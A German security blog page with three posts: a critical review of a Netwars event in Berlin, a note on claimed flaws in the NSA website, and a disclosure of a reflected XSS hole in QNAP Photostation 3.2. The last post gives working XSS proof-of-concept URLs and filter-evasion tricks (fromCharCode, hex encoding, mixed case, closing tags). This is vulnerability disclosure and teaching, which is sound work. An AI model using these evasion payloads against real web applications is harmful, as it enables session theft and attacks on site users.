Mit ‘Exploits’ getaggte Beiträge

„◾Vom heut’gen Tag, von heut’ger Nacht verlange nichts, als was die gestrigen gebracht.“ – J.W. v Goethe

Zusammen mit einem Freund kam ich in den Genuss die Netwars-Präsentation in Berlin besuchen zu dürfen.
Nach Anfahrt von 4 Stunden und einer Präsentation von ca. 2 Stunden, sowie 3,5 Stunden Rückfahrt bleibt ein
eher ernüchterndes Ergebnis. Um nicht zu sagen: aus dem Osten nichts Neues!

Als IT-Security’ler und -wie mein Kumpel sagen würde- „Kenner der Materie“, kann ich nur feststellen es gab nichts an Information, was mich vom Hocker gehauen hätte.

Vielleicht waren die Erwartungen ganz einfach zu hoch gesteckt? Weder war der „Salesman“ Nikolai Kinski anwesend, wie ursprünglich suggeriert wurde, noch der hoch gelobte Hacker „FX“.

Netwars-Berlin

So wurde leider auch in der Talkrunde um Prof. Volker Roth (FU Berlin), Frank Boldewin (IT-Experte) und Eberhard Öhler (Stadtwerke Ettlingen) kein Thema wirklich bis zu einem (für uns) interessanten Punkt vertieft.

Wie z.B. lief der „Hack“ der Stadtwerke ab? Da hätte ich mir mal Beispiele aus der Praxis gewünscht.

Z.B. in diese Richtung (wie es wohl tatsächlich gelaufen ist kann man hier lesen):

„…über eine Suche innerhalb der Suchmaschine Shodan haben wir unser Ziel (Stadtwerke Ettlingen) ausfindig gemacht und auf mögliche Angriffoptionen gecheckt. Anschließend, bewaffnet mit diesen ersten Daten, wurden dann mögliche Exploits unter Verwendung des Metasploit-Framework angewendet, um uns Zugriff zu verschaffen….“

DAS wäre mal Info gewesen. So etwas hat mir über den ganzen Abend hinweg gefehlt! Es muss nicht zu sehr ins fachliche oder technische abdriften, dennoch hätte es einen tieferen Blick offenbart. Zu wenig wurde thematisiert, wie man sich Informationen über ein Ziel beschafft (siehe OSINT) und wie wir alle davon „getroffen“ werden können.

Das man u.U. leicht Opfer wird (besonders wenn man sich mit IT-Sicherheit nicht beschäftigt) und womöglich stillschweigend Teil eines global operierenden Botnetzes mit seinem Rechner wird, dass haben viele schon gehört.
Was so ein Bot mit dem eigenen Rechner anstellen kann, ist den wenigsten jedoch wirklich klar.

Netwars-Talk

Die Lesung aus „Netwars“ war interessant und das Buch ist durchaus auf den ersten Blick eine Kaufempfehlung wert.
Die App werde ich mir persönlich nicht ansehen. Das geht mir zu sehr in die Kommerz und Taschenbuch-Comic Ecke ;-P

Es bleibt abzuwarten wie ernst (und weniger auf Kommerz getrimmt) dieses Projekt weitergeführt wird.
Es spricht nichts dagegen mit diesem ohne Frage genialen Projekt Geld zu verdienen. Aber dann muss auch auf solchen Veranstaltungen der Hammer kreisen und man mit neuen und spannenden Informationen ums Eck kommen.

Wie wäre es mit einem „Live-Hack“? Ein verwundbares System aufsetzen in einer VM, dann einen Angriff simulieren mit den gängigen Hackertools (auf GUI-Ebene natürlich ;-)  und die Besucher staunen lassen.

Wenn Snowden schon mit seinen leaked-Documents es kaum schafft, die Massen nachhaltig zu mobilisieren und wirklich aufzurütteln, dann kann man mit einem „ja, es ist grundsätzlich alles möglich und Passwörter sollten sicher sein“ heute schlichtweg keinen Preis mehr gewinnen.

Da müssen harte visuelle Fakten auf den Tisch! Zeigt den Normalo-Usern doch mal, was man über sie bei Facebook, Twitter und Co. finden könnte! Wo ist der aktuelle Verzweig auf die von Glenn Greenwald vor wenigen Tagen öffentlich abrufbar gestellten NSA-Dokumente?

NSA-Leaked Documents

Ich möchte das Projekt nicht zerreden oder schlecht machen, denn dafür bin ich den Machern viel zu dankbar, die Thematik überhaupt in Angriff genommen zu haben. Das Netwars-Project ist eine Bereicherung, aber es muss eben auch m.E. berechtigte konstruktive Kritik erlaubt sein.

IT-Security Awareness lebt davon visualisiert zu werden. Bilder und konkrete Beispiele bleiben viel länger im Gedächtnis.

Das dieses Projekt selbst auf Seiten der Homepage mit kleineren Problemchen zu kämpfen hatte, wäre auch als netter Hinweis gut angekommen. Was vielleicht als PR-Killer von vielen Firmen angesehen wird (eigene Verwundbarkeit), hätte in diesem Fall sogar als zusätzliches positives PR-Mittel dienen können.Hätte es doch unterstrichen, dass auch die Spezialisten von Netwars nicht frei von Überraschungen sind.

Das Netz ist eben ein tückisches „kleines“ Ding ;-)

 

Weiterführende Quelle zum Thema: Zeit.de
Empfehlungslink zum Thema SHODAN & SCADA/ICS

Advertisements

„◾Wer Freiheiten aufgibt, um Sicherheit zu gewinnen, verdient weder Freiheit noch Sicherheit.“ – Benjamin Franklin

Nach diesem Artikel, der auf Spiegel.de erschienen ist, gab es wohl eine Cross-Site-Scripting Lücke und eine Möglichkeit der SQL-Injection auf der Webseite der NSA. Angeblich sei diese wohl nun behoben.

Dann frage ich mich warum man noch immer mit speziellen Abfragen z.B. „_include“-Verzeichnisse einsehen kann, bzw. nach Quellcode innerhalb der eigentlichen shtml-Seite suchen kann?!?!

Schlechtes Karma! Keine weiteren Details, kein weiterer Kommentar…….

Hier ein paar Screens vom kurzen Ausflug zur NSA-Seite:

 

NSA1

 

NSA2

NSA3

Weitere Quelle: MDR

 

 

„◾Fehler zu machen ist menschlich. Fehler zu wiederholen ist schmerzlich. Dieselben Fehler immer wieder zu machen ist dämlich„- Sinan Gönül

Man könnte denken bei QNAP lernt man kein Stück dazu. Nachdem ich bereits das CERT.at sowie QNAP selbst in der Vergangenheit auf mehrere XSS-Lücken in deren Apps hingewiesen hatte, stelle ich erneut fest, dass man wieder die Tore offen gelassen hat!

Bei einer Art von Bugbounty-Programm würde ich mir wohl an QNAP eine goldene Nase verdienen… #scnr

Diesmal: QNAP-Photostation V.3.2 (auf QNAP NAS TS259+ Pro – Firmware 4.0.7 vom 12.04.2014)

QNAPXSS201404

Hier ist es auf den ersten Blick nur möglich eine Zahl zu übergeben, aber mit dem richtigen Trick können wir auch Text einschleusen und unsere Funktionen etwas pimpen – hier ist dann einfach Kreativität gefragt ;-)

geht -> https://192.168.100.1:80/photo/?windowId=/><script>alert(1)</script>
geht nicht -> https://192.168.100.1:80/photo/?windowId=/><script>alert(„XSS“)</script>

geht doch; ausgetrickst -> https://192.168.100.1:80/photo/?windowId=/><script>alert(String.fromCharCode(88,83,83));</script>

QNAPXSS2014-2
Die Möglichkeiten solche XSS-Angriffe zu starten und eventuelle Filter zu umgehen sind vielfältig.
Werden auf der Webseite z.B. spezielle Zeichen wie single oder double-quote bewusst weggefilter,
so bleibt dem Angreifer die oben beschrieben Option mit Verwendung der ASCII-Character.

Auch HEX-Encoding wäre einen Versuch wert:
<script>alert(„XSSed“);</script> wird dann zu 3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%58%53%53%65%64%22%29%3b%3c%2f%73%63%72%69%70%74%3e

Das Script einfach via Obfuscation vor einem Filter zu „verbergen“ klappt sehr oft auch ganz gut:
<ScRipt>ALeRt(„XSSed“);</sCRipT>

In einigen Fällen ist das XSS erst möglich, wenn zuvor ein „Closing Tag“ gesetzt wird:
„><script>alert(„XSSed“);</script> bzw. /><script>alert(„XSSed“);</script

Links FYI:
ASCII-Converter & noch einer
fromCharCode()